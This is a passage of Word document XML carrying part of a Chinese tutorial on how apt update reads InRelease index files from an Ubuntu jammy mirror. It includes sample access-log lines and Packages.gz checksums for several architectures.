          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.239.252 - - </w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="宋体"/>
          <w:color w:val="999999"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>13/Mar/2023:03:03:54 +0800</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="宋体"/>
          <w:color w:val="999999"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="宋体"/>
          <w:color w:val="669900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>"GET /ubuntu/dists/jammy-updates/InRelease HTTP/1.1"</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> 304 0 </w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="宋体"/>
          <w:color w:val="669900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>"-"</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="宋体"/>
          <w:color w:val="669900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>"Debian APT-HTTP/1.3 (2.4.8) non-interactive"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FA663E" w14:textId="77777777" w:rsidR="00B03241" w:rsidRPr="00B03241" w:rsidRDefault="00B03241" w:rsidP="009222EB">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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.239.252 - - </w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="宋体"/>
          <w:color w:val="999999"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>13/Mar/2023:03:03:54 +0800</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="宋体"/>
          <w:color w:val="999999"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="宋体"/>
          <w:color w:val="669900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>"GET /ubuntu/dists/jammy-backports/InRelease HTTP/1.1"</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> 304 0 </w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="宋体"/>
          <w:color w:val="669900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>"-"</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="宋体"/>
          <w:color w:val="669900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>"Debian APT-HTTP/1.3 (2.4.8) non-interactive"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46313EE0" w14:textId="77777777" w:rsidR="00B03241" w:rsidRPr="00B03241" w:rsidRDefault="00B03241" w:rsidP="009222EB">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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.239.252 - - </w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="宋体"/>
          <w:color w:val="999999"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>13/Mar/2023:03:03:54 +0800</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="宋体"/>
          <w:color w:val="999999"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="宋体"/>
          <w:color w:val="669900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>"GET /ubuntu/dists/jammy-security/InRelease HTTP/1.1"</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> 304 0 </w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="宋体"/>
          <w:color w:val="669900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>"-"</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="宋体"/>
          <w:color w:val="669900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>"Debian APT-HTTP/1.3 (2.4.8) non-interactive"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A45F5DB" w14:textId="77777777" w:rsidR="00B03241" w:rsidRPr="00B03241" w:rsidRDefault="00B03241" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif" w:hint="eastAsia"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif"/>
          <w:color w:val="BBBBBB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F5D4A3" w14:textId="77777777" w:rsidR="00B03241" w:rsidRPr="00B03241" w:rsidRDefault="00B03241" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif" w:hint="eastAsia"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>COPY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EB3148" w14:textId="77777777" w:rsidR="00B03241" w:rsidRPr="00B03241" w:rsidRDefault="00B03241" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif" w:eastAsia="宋体" w:hAnsi="Noto Serif" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif" w:eastAsia="宋体" w:hAnsi="Noto Serif" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>对于</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif" w:eastAsia="宋体" w:hAnsi="Noto Serif" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>update</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif" w:eastAsia="宋体" w:hAnsi="Noto Serif" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>，会根据源的相关设置访问</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Inconsolata" w:eastAsia="宋体" w:hAnsi="Inconsolata" w:cs="宋体"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>/ubuntu/dists/</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Inconsolata" w:eastAsia="宋体" w:hAnsi="Inconsolata" w:cs="宋体"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>（设置的</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Inconsolata" w:eastAsia="宋体" w:hAnsi="Inconsolata" w:cs="宋体"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Distribution</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Inconsolata" w:eastAsia="宋体" w:hAnsi="Inconsolata" w:cs="宋体"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Inconsolata" w:eastAsia="宋体" w:hAnsi="Inconsolata" w:cs="宋体"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>/InRelease</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif" w:eastAsia="宋体" w:hAnsi="Noto Serif" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>的文件，这个也是一个索引，记录了有哪些相应平台的包存储在服务器上</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECE563F" w14:textId="77777777" w:rsidR="00B03241" w:rsidRPr="00B03241" w:rsidRDefault="00B03241" w:rsidP="009222EB">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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> b96c0cfe911414e1b7f2df5c88844369          1192665 main/binary-amd64/Packages.gz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCF867B" w14:textId="77777777" w:rsidR="00B03241" w:rsidRPr="00B03241" w:rsidRDefault="00B03241" w:rsidP="009222EB">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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> 84a735928def889314d9d28d0819425c          1068823 main/binary-arm64/Packages.gz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1066DD20" w14:textId="77777777" w:rsidR="00B03241" w:rsidRPr="00B03241" w:rsidRDefault="00B03241" w:rsidP="009222EB">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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> 6a1ab8e4d5aa235c81e2e036e01e9926           775999 main/binary-armhf/Packages.gz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553DD031" w14:textId="77777777" w:rsidR="00B03241" w:rsidRPr="00B03241" w:rsidRDefault="00B03241" w:rsidP="009222EB">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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> 8d8471fdecfb661f6580df6096a53c6a           570121 main/binary-i386/Packages.gz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F68D126" w14:textId="77777777" w:rsidR="00B03241" w:rsidRPr="00B03241" w:rsidRDefault="00B03241" w:rsidP="009222EB">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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3a43d2dda28cf2e7e1d885484a1ce249           732797 main/binary-ppc64el/Packages.gz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332C877B" w14:textId="77777777" w:rsidR="00B03241" w:rsidRPr="00B03241" w:rsidRDefault="00B03241" w:rsidP="009222EB">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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> 8ac0edaecf66d4bd0631294a7908154b           690004 main/binary-riscv64/Packages.gz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E564A02" w14:textId="77777777" w:rsidR="00B03241" w:rsidRPr="00B03241" w:rsidRDefault="00B03241" w:rsidP="009222EB">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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> fb78c7c1b05b2dba72b8ec6d99bb6462           717683 main/binary-s390x/Packages.gz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F61FDC6" w14:textId="77777777" w:rsidR="00B03241" w:rsidRPr="00B03241" w:rsidRDefault="00B03241" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif" w:hint="eastAsia"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif"/>
          <w:color w:val="BBBBBB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5186F8" w14:textId="77777777" w:rsidR="00B03241" w:rsidRPr="00B03241" w:rsidRDefault="00B03241" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif" w:hint="eastAsia"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>COPY</w:t>
      </w:r>
    </w:p>
